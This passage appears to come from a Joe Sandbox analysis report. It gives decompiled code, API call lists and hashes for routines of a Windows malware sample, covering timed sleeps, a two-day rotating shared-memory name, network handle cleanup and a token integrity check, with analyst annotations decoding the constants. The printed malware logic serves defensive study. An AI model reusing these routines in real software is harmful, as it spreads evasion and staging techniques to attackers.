                            				void* _t78;
                            				void** _t82;
                            				signed int _t86;
                            				void* _t89;
                            
                            				_t76 = __edx;
                            				_v52 = 0;
                            				memset( &_v48, 0, 0x2c);
                            				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0); // manual-reset timer; this routine sleeps by waiting on it rather than calling Sleep()
				_v60 = _t46;
				if(_t46 == 0) {
                            					_v92.HighPart = GetLastError();
                            				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x6da2e0);
					_v76 = 0;
					_v80 = 0;
					L006D82AA(); // _allmul(*0x6da2e0, 0, 0xff676980, 0xffffffff): 0xffffffffff676980 = -10,000,000, so the product is *0x6da2e0 seconds expressed as a negative (relative) due time in 100 ns units
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x6da30c; // 0x18c
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff); // waits on {timer, handle from 0x6da30c}; 0 (WAIT_OBJECT_0) means the timer expired, any other wake-up skips the work below
                            					_v108 = _t53;
                            					if(_t53 == 0) {
                            						if(_a8 != 0) {
                            							L4:
                            							 *0x6da2ec = 5;
                            						} else {
                            							_t69 = E006D61FE(_t76); // executed
                            							if(_t69 != 0) {
                            								goto L4;
                            							}
                            						}
                            						_v104.LowPart = 0;
						L6:
                            						if(_v104.LowPart == 1 && ( *0x6da300 & 0x00000001) == 0) {
                            							_v104.LowPart = 2;
                            						}
                            						_t74 = _v104.LowPart;
                            						_t58 = _t74 << 4;
                            						_t78 = _t89 + (_t74 << 4) + 0x38;
                            						_t75 = _t74 + 1;
                            						_v92.LowPart = _t74 + 1;
                            						_t61 = E006D64A2( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
                            						_v124 = _t61;
                            						if(_t61 != 0) {
                            							goto L17;
                            						}
                            						_t66 = _v92;
                            						_v104.LowPart = _t66;
                            						if(_t66 != 3) {
                            							goto L6;
                            						} else {
                            							_t68 = E006D6821(_t75,  &_v72, _a4, _a8); // executed
                            							_v124.HighPart = _t68;
                            						}
                            						goto L12;
                            						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) { // any error other than 0x10d2: sleep *0x6da2e4 seconds (same -10,000,000 scaling as above) and retry from L6
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x6da2e4);
							goto L21;
						} else {
							__eflags =  *0x6da2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E006D14C6();
								_push(0xffffffff);
								_push(0xdc3cba00); // 0xffffffffdc3cba00 = -600,000,000 = 60 s per unit, so the delay is *0x6da2e8 minutes
								_push(0);
								_push( *0x6da2e8);
                            								L21:
                            								L006D82AA();
                            								_v104.LowPart = _t61;
                            								_v100 = _t78;
                            								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                            								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                            								_v128 = _t65;
                            								__eflags = _t65;
                            								if(_t65 == 0) {
                            									goto L6;
                            								} else {
                            									goto L12;
                            								}
                            							}
                            						}
                            						L25:
                            					}
				L12:
				_t82 =  &_v72;
				_t73 = 3;
				do { // free the three heap blocks kept at 16-byte stride from _v72, then close the timer
					_t54 =  *_t82;
					if(_t54 != 0) {
						HeapFree( *0x6da2d8, 0, _t54);
					}
					_t82 =  &(_t82[4]);
					_t73 = _t73 - 1;
				} while (_t73 != 0);
				CloseHandle(_v80);
                            				}
                            				return _v92.HighPart;
                            				goto L25;
                            			}


































                            APIs
                            • memset.NTDLL ref: 006D5194
                            • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 006D51A0
                            • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 006D51C8
                            • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000), ref: 006D51E8
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,006D1273,?), ref: 006D5203
                            • HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,006D1273,?,00000000), ref: 006D52AA
                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,006D1273,?,00000000,?,?), ref: 006D52BA
                            • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 006D52F4
                            • SetWaitableTimer.KERNELBASE(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 006D530E
                            • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 006D531A
                              • Part of subcall function 006D61FE: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,014A93D8,00000000,?,74D0F710,00000000,74D0F730), ref: 006D624D
                              • Part of subcall function 006D61FE: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,014A9410,?,00000000,30314549,00000014,004F0053,014A93CC), ref: 006D62EA
                              • Part of subcall function 006D61FE: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,006D521B), ref: 006D62FC
                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,006D1273,?,00000000,?,?), ref: 006D532D
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
• Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                            • String ID:
                            • API String ID: 3521023985-0
                            • Opcode ID: 21f46562f1eae466ad17a8e25cba66c0c1d45648ae6f6fd4cc0e5893f36cc06f
                            • Instruction ID: 502b6a64d36ba1a49f4e0f4451fc5ea3ebd53110780736891db1332f2f234963
                            • Opcode Fuzzy Hash: 21f46562f1eae466ad17a8e25cba66c0c1d45648ae6f6fd4cc0e5893f36cc06f
                            • Instruction Fuzzy Hash: 90514D71909310AFC750AF659C44D9BBBEAEF89320F104A1FF4A5D2360D7708644CFA6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 74%
                            			E006D60A1(intOrPtr __edx, void** _a4, void** _a8) {
                            				intOrPtr _v8;
                            				struct _FILETIME* _v12;
                            				short _v56;
                            				struct _FILETIME* _t12;
                            				intOrPtr _t13;
                            				void* _t17;
                            				void* _t21;
                            				intOrPtr _t27;
                            				long _t28;
                            				void* _t30;
                            
                            				_t27 = __edx;
				_t12 =  &_v12;
				GetSystemTimeAsFileTime(_t12);
				_push(0x192);
				_push(0x54d38000);
				_push(_v8);
				_push(_v12);
				L006D82A4(); // _aulldiv(FILETIME, 0x19254d38000): 1,728,000,000,000 x 100 ns is exactly 2 days, so the quotient is a 2-day bucket number
				_push(_t12);
				_v12 = _t12;
				_t13 =  *0x6da348; // 0xdcd5a8
				_t5 = _t13 + 0x6db87a; // 0x14a8e22
				_t6 = _t13 + 0x6db594; // 0x530025
				_push(0x16);
				_push( &_v56);
				_v8 = _t27;
				L006D7F0A(); // _snwprintf(&_v56, 0x16, ...): the bucket number becomes part of the object name, so the name changes every two days
				_t17 = CreateFileMappingW(0xffffffff, 0x6da34c, 4, 0, 0x1000,  &_v56); // executed; pagefile-backed 0x1000-byte section, PAGE_READWRITE, SECURITY_ATTRIBUTES at 0x6da34c
                            				_t30 = _t17;
				if(_t30 == 0) {
					_t28 = GetLastError();
				} else {
					if(GetLastError() == 0xb7) { // ERROR_ALREADY_EXISTS: only a section another instance created earlier is accepted
						_t21 = MapViewOfFile(_t30, 6, 0, 0, 0); // executed; FILE_MAP_READ | FILE_MAP_WRITE
						if(_t21 == 0) {
							_t28 = GetLastError();
							if(_t28 != 0) {
								goto L6;
							}
						} else {
							 *_a4 = _t30;
							 *_a8 = _t21;
							_t28 = 0;
						}
					} else {
						_t28 = 2; // the call created a fresh section: discard it and report ERROR_FILE_NOT_FOUND (the inverse of a single-instance mutex check)
						L6:
						CloseHandle(_t30);
					}
				}
				return _t28;
                            			}
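The two CRT helper calls above, _allmul in E006D517A and _aulldiv in E006D60A1, hide their operands behind four 32-bit pushes, which is where the sleep length and the two-day name period come from. The following block is an added example, not code from the sample or from the Joe Sandbox report: it reassembles the 64-bit operands exactly as pushed in the listings so the constants can be checked on any machine. The operand values are taken from the listings; the function names, the 300-second sample input and the 1970-01-01 FILETIME are my own.

```c
/* Added example (not from the sample or the report): decode the 64-bit
 * constants passed to _allmul (E006D517A) and _aulldiv (E006D60A1). */
#include <stdint.h>
#include <stdio.h>

/* The __cdecl CRT helpers take two 64-bit values as four 32-bit stack
 * words: a_lo, a_hi, b_lo, b_hi. In the listing the first push is b_hi
 * and the last push is a_lo. */
static uint64_t join64(uint32_t lo, uint32_t hi) {
    return ((uint64_t)hi << 32) | lo;
}

/* _allmul: 64-bit multiply, wraps modulo 2^64 like the CRT helper. */
int64_t allmul(uint32_t a_lo, uint32_t a_hi, uint32_t b_lo, uint32_t b_hi) {
    return (int64_t)(join64(a_lo, a_hi) * join64(b_lo, b_hi));
}

/* _aulldiv: unsigned 64-bit divide. */
uint64_t aulldiv(uint32_t a_lo, uint32_t a_hi, uint32_t b_lo, uint32_t b_hi) {
    return join64(a_lo, a_hi) / join64(b_lo, b_hi);
}

/* E006D517A: _allmul(*0x6da2e0, 0, 0xff676980, 0xffffffff).
 * 0xffffffffff676980 is -10,000,000, i.e. minus one second in the 100 ns
 * units SetWaitableTimer uses; a negative due time is relative to now. */
int64_t sleep_due_time_100ns(uint32_t seconds_at_6da2e0) {
    return allmul(seconds_at_6da2e0, 0, 0xff676980u, 0xffffffffu);
}

/* Convert the due time back to seconds for reporting. */
double sleep_seconds(uint32_t seconds_at_6da2e0) {
    return -(double)sleep_due_time_100ns(seconds_at_6da2e0) / 10000000.0;
}

/* Retry path of the same function: _allmul(*0x6da2e8, 0, 0xdc3cba00,
 * 0xffffffff); 0xffffffffdc3cba00 is -600,000,000, i.e. 60 s per unit. */
int64_t retry_due_time_100ns(uint32_t units_at_6da2e8) {
    return allmul(units_at_6da2e8, 0, 0xdc3cba00u, 0xffffffffu);
}

/* E006D60A1: _aulldiv(FILETIME.lo, FILETIME.hi, 0x54d38000, 0x192).
 * 0x19254d38000 = 1,728,000,000,000 units of 100 ns = exactly 2 days, so
 * the quotient is the 2-day bucket that ends up in the mapping name. */
uint64_t two_day_bucket(uint64_t filetime) {
    return aulldiv((uint32_t)filetime, (uint32_t)(filetime >> 32),
                   0x54d38000u, 0x192u);
}

int main(void) {
    /* Constructed inputs: 300 s stored at 0x6da2e0, one retry unit, and the
     * FILETIME of 1970-01-01 00:00:00 UTC (116444736000000000). */
    printf("sleep due time: %lld x 100 ns = %.0f s\n",
           (long long)sleep_due_time_100ns(300), sleep_seconds(300));
    printf("retry due time for 1 unit: %lld x 100 ns\n",
           (long long)retry_due_time_100ns(1));
    printf("2-day bucket at the Unix epoch: %llu\n",
           (unsigned long long)two_day_bucket(116444736000000000ULL));
    return 0;
}
```

Feeding the value found at 0x6da2e0 in the memory dump into sleep_seconds gives the actual delay behind the "Contains long sleeps" signature, and two_day_bucket applied to the sandbox's clock reproduces the bucket number that the section name was built from at analysis time.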














                            APIs
                            • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,?,?,?,?,?,?,006D113B,?,?,4D283A53,?,?), ref: 006D60AD
                            • _aulldiv.NTDLL(?,?,54D38000,00000192), ref: 006D60C3
                            • _snwprintf.NTDLL ref: 006D60E8
                            • CreateFileMappingW.KERNELBASE(000000FF,006DA34C,00000004,00000000,00001000,?,?,?,?,?,00000000), ref: 006D6104
                            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,006D113B,?,?,4D283A53,?), ref: 006D6116
                            • MapViewOfFile.KERNELBASE(00000000,00000006,00000000,00000000,00000000,?,?,?,?,00000000), ref: 006D612D
                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000,?,?,?,?,?,?,006D113B,?,?,4D283A53), ref: 006D614E
                            • GetLastError.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,006D113B,?,?,4D283A53,?), ref: 006D6156
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
• Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: File$ErrorLastTime$CloseCreateHandleMappingSystemView_aulldiv_snwprintf
                            • String ID:
                            • API String ID: 1814172918-0
                            • Opcode ID: e6781826cedba015d0a6047c370e2a12d3b5d3dcec3d228349416feed7d49842
                            • Instruction ID: 5e39738df0bd45feb47baddfb632401307f85c61fa46d32f8cfbefa379bf34b0
                            • Opcode Fuzzy Hash: e6781826cedba015d0a6047c370e2a12d3b5d3dcec3d228349416feed7d49842
                            • Instruction Fuzzy Hash: 96219072E01204BBD721AB68DC05FAE7BBBAB48750F254027F609E73D1DBB19905CB60
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            control_flow_graph 258 6d70e7-6d70f2 259 6d70fe-6d7111 258->259 260 6d70f4-6d70f9 call 6d2129 258->260 262 6d711c-6d7121 259->262 263 6d7113-6d711a InternetSetStatusCallback InternetCloseHandle 259->263 260->259 264 6d712c-6d7131 262->264 265 6d7123-6d712a InternetSetStatusCallback InternetCloseHandle 262->265 263->262 266 6d713c-6d7147 264->266 267 6d7133-6d713a InternetSetStatusCallback InternetCloseHandle 264->267 265->264 268 6d714c-6d7151 266->268 269 6d7149-6d714a CloseHandle 266->269 267->266 270 6d7156-6d715d 268->270 271 6d7153-6d7154 CloseHandle 268->271 269->268 272 6d715f-6d7168 call 6d789e 270->272 273 6d716b-6d7170 270->273 271->270 272->273 275 6d7178-6d717c 273->275 276 6d7172-6d7173 call 6d789e 273->276 279 6d717e-6d717f call 6d789e 275->279 280 6d7184-6d7189 275->280 276->275 279->280 282 6d718b-6d718c call 6d789e 280->282 283 6d7191-6d7193 280->283 282->283
                            C-Code - Quality: 93%
                            			E006D70E7(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                            				void* _t17;
                            				void* _t18;
                            				void* _t19;
                            				void* _t20;
                            				void* _t21;
                            				intOrPtr _t24;
                            				void* _t37;
                            				void* _t41;
                            				intOrPtr* _t45;
                            
                            				_t41 = __edi;
                            				_t37 = __ebx;
                            				_t45 = __eax;
                            				_t16 =  *((intOrPtr*)(__eax + 0x20));
                            				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                            					E006D2129(_t16, __ecx, 0xea60);
                            				}
                            				_t17 =  *(_t45 + 0x18);
                            				_push(_t37);
                            				_push(_t41);
                            				if(_t17 != 0) {
                            					InternetSetStatusCallback(_t17, 0);
                            					InternetCloseHandle( *(_t45 + 0x18)); // executed
                            				}
                            				_t18 =  *(_t45 + 0x14);
                            				if(_t18 != 0) {
                            					InternetSetStatusCallback(_t18, 0);
                            					InternetCloseHandle( *(_t45 + 0x14));
                            				}
                            				_t19 =  *(_t45 + 0x10);
                            				if(_t19 != 0) {
                            					InternetSetStatusCallback(_t19, 0);
                            					InternetCloseHandle( *(_t45 + 0x10));
                            				}
                            				_t20 =  *(_t45 + 0x1c);
                            				if(_t20 != 0) {
                            					CloseHandle(_t20);
                            				}
                            				_t21 =  *(_t45 + 0x20);
                            				if(_t21 != 0) {
                            					CloseHandle(_t21);
                            				}
                            				_t22 =  *((intOrPtr*)(_t45 + 8));
                            				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                            					E006D789E(_t22);
                            					 *((intOrPtr*)(_t45 + 8)) = 0;
                            					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                            				}
                            				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                            				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                            					E006D789E(_t23);
                            				}
                            				_t24 =  *_t45;
                            				if(_t24 != 0) {
                            					_t24 = E006D789E(_t24);
                            				}
                            				_t46 =  *((intOrPtr*)(_t45 + 4));
                            				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                            					return E006D789E(_t46);
                            				}
                            				return _t24;
                            			}

                            APIs
                            • InternetSetStatusCallback.WININET(?,00000000), ref: 006D7115
                            • InternetCloseHandle.WININET(?), ref: 006D711A
                            • InternetSetStatusCallback.WININET(?,00000000), ref: 006D7125
                            • InternetCloseHandle.WININET(?), ref: 006D712A
                            • InternetSetStatusCallback.WININET(?,00000000), ref: 006D7135
                            • InternetCloseHandle.WININET(?), ref: 006D713A
                            • CloseHandle.KERNEL32(?,00000000,00000102,?,?,006D5DA7,?,?,74CF81D0,00000000,00000000), ref: 006D714A
                            • CloseHandle.KERNEL32(?,00000000,00000102,?,?,006D5DA7,?,?,74CF81D0,00000000,00000000), ref: 006D7154
                              • Part of subcall function 006D2129: WaitForMultipleObjects.KERNEL32(00000002,006D7C1D,00000000,006D7C1D,?,?,?,006D7C1D,0000EA60), ref: 006D2144
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Internet$CloseHandle$CallbackStatus$MultipleObjectsWait
                            • String ID:
                            • API String ID: 2824497044-0
                            • Opcode ID: 98f7bcf0d0f0331b74f186d903684da46be2ce648ffd9e1c65909177d995a796
                            • Instruction ID: 39c10c24b924e660fec2eb7dac11658e25739b258cc435fd2c15e406b3cd0c22
                            • Opcode Fuzzy Hash: 98f7bcf0d0f0331b74f186d903684da46be2ce648ffd9e1c65909177d995a796
                            • Instruction Fuzzy Hash: 1911FC76E047486BC630AFAAEC84C5BB7EBAB593003690E1EF145D3711D724FC448A65
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 297 6d578b-6d57a6 298 6d57ac-6d57c5 OpenProcessToken 297->298 299 6d5845-6d5851 297->299 300 6d5844 298->300 301 6d57c7-6d57f2 GetTokenInformation * 2 298->301 300->299 302 6d583a-6d5843 CloseHandle 301->302 303 6d57f4-6d5801 call 6d7a71 301->303 302->300 306 6d5839 303->306 307 6d5803-6d5814 GetTokenInformation 303->307 306->302 308 6d5816-6d5830 GetSidSubAuthorityCount GetSidSubAuthority 307->308 309 6d5833-6d5834 call 6d789e 307->309 308->309 309->306
                            C-Code - Quality: 100%
                            			E006D578B(long* _a4) {
                            				long _v8;
                            				void* _v12;
                            				void _v16;
                            				long _v20;
                            				int _t33;
                            				void* _t46;
                            
                            				_v16 = 1;
                            				_v20 = 0x2000;
                            				if( *0x6da2fc > 5) {
                            					_v16 = 0;
                            					if(OpenProcessToken(0xffffffff, 0x20008,  &_v12) != 0) {
                            						GetTokenInformation(_v12, 0x14,  &_v16, 4,  &_v8); // executed
                            						_v8 = 0;
                            						GetTokenInformation(_v12, 0x19, 0, 0,  &_v8); // executed
                            						if(_v8 != 0) {
                            							_t46 = E006D7A71(_v8);
                            							if(_t46 != 0) {
                            								_t33 = GetTokenInformation(_v12, 0x19, _t46, _v8,  &_v8); // executed
                            								if(_t33 != 0) {
                            									_v20 =  *(GetSidSubAuthority( *_t46,  *(GetSidSubAuthorityCount( *_t46)) - 0x00000001 & 0x000000ff));
                            								}
                            								E006D789E(_t46);
                            							}
                            						}
                            						CloseHandle(_v12);
                            					}
                            				}
                            				 *_a4 = _v20;
                            				return _v16;
                            			}

                            APIs
                            • OpenProcessToken.ADVAPI32(000000FF,00020008,00000000,00000000), ref: 006D57BD
                            • GetTokenInformation.KERNELBASE(00000000,00000014(TokenIntegrityLevel),00000001,00000004,?,00000000), ref: 006D57DD
                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,00000000,?), ref: 006D57ED
                            • CloseHandle.KERNEL32(00000000), ref: 006D583D
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • GetTokenInformation.KERNELBASE(00000000,00000019(TokenIntegrityLevel),00000000,?,?,?,?), ref: 006D5810
                            • GetSidSubAuthorityCount.ADVAPI32(00000000), ref: 006D5818
                            • GetSidSubAuthority.ADVAPI32(00000000,?), ref: 006D5828
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: Token$Information$Authority$AllocateCloseCountHandleHeapOpenProcess
                            • String ID:
                            • API String ID: 1295030180-0
                            • Opcode ID: 7c98b45fc02c6abc6dbdb9b8c3ecb2f9170500ff2bb79b5ff4571dbed9128312
                            • Instruction ID: 714a1f7cf6d130cc7c00b48acb8199db712a297552a811bd0cea2e606dd09c59
                            • Opcode Fuzzy Hash: 7c98b45fc02c6abc6dbdb9b8c3ecb2f9170500ff2bb79b5ff4571dbed9128312
                            • Instruction Fuzzy Hash: 41213975D00219FFEB009F94DC44EEEBBBAEB48304F1040AAE911A6261D7714E44EB61
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            C-Code - Quality: 64%
                            			E006D2281(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
                            				intOrPtr _v8;
                            				intOrPtr _t9;
                            				intOrPtr _t13;
                            				char* _t19;
                            				char* _t28;
                            				void* _t33;
                            				void* _t34;
                            				char* _t36;
                            				void* _t38;
                            				intOrPtr* _t39;
                            				char* _t40;
                            				char* _t42;
                            				char* _t43;
                            
                            				_t34 = __edx;
                            				_push(__ecx);
                            				_t9 =  *0x6da348; // 0xdcd5a8
                            				_t1 = _t9 + 0x6db624; // 0x253d7325
                            				_t36 = 0;
                            				_t28 = E006D6779(__ecx, _t1);
                            				if(_t28 != 0) {
                            					_t39 = __imp__;
                            					_t13 =  *_t39(_t28, _t38);
                            					_v8 = _t13;
                            					_t6 =  *_t39(_a4) + 1; // 0x14a9601
                            					_t40 = E006D7A71(_v8 + _t6);
                            					if(_t40 != 0) {
                            						strcpy(_t40, _t28);
                            						_pop(_t33);
                            						__imp__(_t40, _a4);
                            						_t19 = E006D44D8(_t33, _t34, _t40, _a8); // executed
                            						_t36 = _t19;
                            						E006D789E(_t40);
                            						_t42 = E006D17F0(StrTrimA(_t36, "="), _t36);
                            						if(_t42 != 0) {
                            							E006D789E(_t36);
                            							_t36 = _t42;
                            						}
                            						_t43 = E006D5454(_t36, _t33);
                            						if(_t43 != 0) {
                            							E006D789E(_t36);
                            							_t36 = _t43;
                            						}
                            					}
                            					E006D789E(_t28);
                            				}
                            				return _t36;
                            			}

                            APIs
                              • Part of subcall function 006D6779: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,006D229A,253D7325,00000000,00000000,?,7491C740,006D3831), ref: 006D67E0
                              • Part of subcall function 006D6779: sprintf.NTDLL ref: 006D6801
                            • lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,7491C740,006D3831,00000000,014A9600), ref: 006D22AC
                            • lstrlen.KERNEL32(00000000,?,7491C740,006D3831,00000000,014A9600), ref: 006D22B4
                              • Part of subcall function 006D7A71: RtlAllocateHeap.NTDLL(00000000,00000000,006D4DB1), ref: 006D7A7D
                            • strcpy.NTDLL ref: 006D22CB
                            • lstrcat.KERNEL32(00000000,00000000), ref: 006D22D6
                              • Part of subcall function 006D44D8: lstrlen.KERNEL32(00000000,00000000,006D3831,00000000,?,006D22E5,00000000,006D3831,?,7491C740,006D3831,00000000,014A9600), ref: 006D44E9
                              • Part of subcall function 006D789E: RtlFreeHeap.NTDLL(00000000,00000000,006D4E3E,00000000,?,00000000,00000000), ref: 006D78AA
                            • StrTrimA.SHLWAPI(00000000,=,00000000,00000000,006D3831,?,7491C740,006D3831,00000000,014A9600), ref: 006D22F3
                              • Part of subcall function 006D17F0: lstrlen.KERNEL32(00000000,00000000,00000000,00000000,?,006D22FF,00000000,?,7491C740,006D3831,00000000,014A9600), ref: 006D17FA
                              • Part of subcall function 006D17F0: _snprintf.NTDLL ref: 006D1858
                            Strings
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
                            • API ID: lstrlen$Heap$AllocateFreeTrim_snprintflstrcatsprintfstrcpy
                            • String ID: =
                            • API String ID: 2864389247-1428090586
                            • Opcode ID: 4db29876a2f8e6bc82a2b1c8fc8727f2a82c849e8c3a9d4a48d90c819d0db332
                            • Instruction ID: 16a778ebe7bf2d37d924cc9b9ed2f1946385ac9b82b7e3776a8e382576e315c7
                            • Opcode Fuzzy Hash: 4db29876a2f8e6bc82a2b1c8fc8727f2a82c849e8c3a9d4a48d90c819d0db332
                            • Instruction Fuzzy Hash: 47119133D0522577476277B89C45CAE3BAF8E99750316002FF5009B312DB64CD0197E6
                            Uniqueness

                            Uniqueness Score: -1.00%

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 337 6d5e6f-6d5ea1 call 6d58f8 340 6d5f89-6d5f8f 337->340 341 6d5ea7-6d5eae call 6d5a69 337->341 343 6d5eb3-6d5eb7 341->343 344 6d5ebd-6d5ecf SysAllocString 343->344 345 6d5f80-6d5f85 343->345 346 6d5f4e-6d5f52 344->346 347 6d5ed1-6d5ee4 SysAllocString 344->347 345->340 349 6d5f5d-6d5f61 346->349 350 6d5f54-6d5f57 SysFreeString 346->350 347->346 348 6d5ee6-6d5eea 347->348 353 6d5eec-6d5ef6 SysAllocString 348->353 354 6d5efe-6d5f4c 348->354 351 6d5f6c-6d5f6e 349->351 352 6d5f63-6d5f66 SysFreeString 349->352 350->349 355 6d5f77-6d5f7c 351->355 356 6d5f70-6d5f71 SysFreeString 351->356 352->351 353->349 357 6d5ef8-6d5efa 353->357 354->346 355->345 356->355 357->354
                            APIs
                              • Part of subcall function 006D58F8: IUnknown_QueryService.SHLWAPI(00000000,4C96BE40,014A89D0,006D5E9D,?,?,?,?,?,?,?,?,?,?,?,006D5E9D), ref: 006D59C5
                              • Part of subcall function 006D5A69: IUnknown_QueryInterface_Proxy.RPCRT4(?,E7A1AF80,?), ref: 006D5AA6
                              • Part of subcall function 006D5A69: IUnknown_QueryInterface_Proxy.RPCRT4(?,A4C6892C,?), ref: 006D5AD7
                            • SysAllocString.OLEAUT32(00000000), ref: 006D5EC9
                            • SysAllocString.OLEAUT32(0070006F), ref: 006D5EDD
                            • SysAllocString.OLEAUT32(00000000), ref: 006D5EEF
                            • SysFreeString.OLEAUT32(00000000), ref: 006D5F57
                            • SysFreeString.OLEAUT32(00000000), ref: 006D5F66
                            • SysFreeString.OLEAUT32(00000000), ref: 006D5F71
                            Memory Dump Source
                            • Source File: 00000000.00000002.505745541.00000000006D1000.00000020.10000000.00040000.00000000.sdmp, Offset: 006D0000, based on PE: true
                            • Associated: 00000000.00000002.505731585.00000000006D0000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505786460.00000000006D9000.00000002.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505804953.00000000006DA000.00000004.10000000.00040000.00000000.sdmp
                            • Associated: 00000000.00000002.505825870.00000000006DC000.00000002.10000000.00040000.00000000.sdmp
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_0_2_6d0000_main.jbxd
                            Similarity
